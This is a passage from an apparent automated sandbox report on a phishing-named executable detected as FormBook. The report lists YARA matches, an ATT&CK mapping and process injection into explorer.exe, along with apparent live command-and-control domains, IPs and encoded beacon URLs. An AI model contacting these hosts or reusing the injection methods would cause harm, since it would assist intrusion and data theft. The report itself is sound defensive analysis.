          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information5Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 458798 Sample: QUOTATION LIST FOR NEW ORDER.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 5 other signatures 2->43 10 QUOTATION LIST FOR NEW ORDER.exe 3 2->10         started        process3 file4 29 C:\...\QUOTATION LIST FOR NEW ORDER.exe.log, ASCII 10->29 dropped 13 QUOTATION LIST FOR NEW ORDER.exe 10->13         started        16 QUOTATION LIST FOR NEW ORDER.exe 10->16         started        process5 signatures6 53 Modifies the context of a thread in another process (thread injection) 13->53 55 Maps a DLL or memory area into another process 13->55 57 Sample uses process hollowing technique 13->57 59 Queues an APC in another process (thread injection) 13->59 18 explorer.exe 13->18 injected process7 dnsIp8 31 www.quotovate.com 47.222.2.124, 80 SUDDENLINK-COMMUNICATIONSUS United States 18->31 33 everesttechsolutions.com 204.11.58.233, 49704, 80 PUBLIC-DOMAIN-REGISTRYUS United States 18->33 35 2 other IPs or domains 18->35 45 System process connects to network (likely due to code injection or exploit) 18->45 22 cmmon32.exe 18->22         started        signatures9 process10 signatures11 47 Modifies the context of a thread in another process (thread injection) 22->47 49 Maps a DLL or memory area into another process 22->49 51 Tries to detect virtualization through RDTSC time measurements 22->51 25 cmd.exe 1 22->25         started        process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTATION LIST FOR NEW ORDER.exe61%VirustotalBrowse
          QUOTATION LIST FOR NEW ORDER.exe46%MetadefenderBrowse
          QUOTATION LIST FOR NEW ORDER.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          QUOTATION LIST FOR NEW ORDER.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comd30%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.carterandcone.comh-s0%Avira URL Cloudsafe
          http://www.fontbureau.comd:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comessed0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/:0%Avira URL Cloudsafe
          http://www.fontbureau.comldF0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
          http://www.fontbureau.comW.TTFk0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.com90%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.fontbureau.como80%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.fontbureau.comalsd0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.tiro.comslnt0%URL Reputationsafe
          http://www.fontbureau.comcomd0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htmO;0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/N0%URL Reputationsafe
          http://www.fontbureau.comY0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
          http://www.carterandcone.com-sQE1s/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/xS0%Avira URL Cloudsafe
          http://www.fontbureau.comto0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          www.appackersandmoversbengaluru.com/p4se/0%Avira URL Cloudsafe
          http://www.fontbureau.comessed30%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
          http://www.everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
          http://www.fontbureau.comcomF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/(0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.urwpp.dej0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/(0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.quotovate.com
          		47.222.2.124
          		truetrue
            		unknown
            everesttechsolutions.com
            		204.11.58.233
            		truetrue
              		unknown
              www.tomio.tech
              		unknown
              		unknowntrue
                		unknown
                www.everesttechsolutions.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.appackersandmoversbengaluru.com/p4se/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comd3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                        		high
                        http://www.carterandcone.comh-sQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.comd:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designersGNQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comessedQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersZQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252531304.00000000059F1000.00000004.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247644835.00000000059F0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comldFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comW.TTFkQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersbQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255121412.00000000059F1000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com9QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255135599.00000000059FA000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.como8QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252567447.00000000059D2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sakkal.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com.TTFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers6MQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253053283.00000000059F1000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comalsdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/YQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.335006943.0000000006870000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/ZQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.galapagosdesign.com/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.257287203.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.agfamonotype.QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261422144.00000000059F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.tiro.comslntQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248396955.00000000059F2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comcomdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253506597.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comTCQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmO;QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.258690188.00000000059C8000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/NQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comYQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252917416.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/GQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.com-sQE1s/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/xSQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comtoQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/jp/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comaQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252701033.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
